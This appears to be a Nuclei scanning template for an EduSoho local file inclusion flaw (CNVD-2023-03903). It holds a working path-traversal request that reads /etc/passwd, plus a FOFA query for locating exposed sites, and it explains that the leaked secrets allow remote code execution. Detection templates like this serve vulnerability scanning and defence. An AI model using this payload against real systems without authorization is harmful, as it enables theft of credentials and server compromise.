id: CNVD-2023-03903

info:
  name: EduSoho < v22.4.7 - Local File Inclusion
  author: securityforeveryone
  severity: high
  description: |
    The edusoho education and training system <v22.4.7 has unauthorized file reading vulnerability. Through this vulnerability, an attacker can read the contents of the config/parameters.yml file and obtain sensitive information such as the secret value saved in the file and database account password. After the secret value is obtained, an attacker can implement RCE with symfony _fragment routing.
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/135007351
    - https://github.com/gobysec/GobyVuls/blob/master/CNVD-2023-03903.md
  metadata:
    verified: true
    max-request: 1
    vendor: hagzhou-kuozhi-network-technology
    product: edusoho
    fofa-query: title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")
  tags: edusoho

http:
  - raw:
      - |
        GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: content_type
        words:
          - "text/csv"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bf4d98a1d5071ee2125069f252cb7c9b5c82786c2c6417efcdcc76d4d11974a9022100fb6150249e310852df3949616184494dfc7f5862534302a1a36b7416621527fc:922c64590222798bb761d5b6d8e72950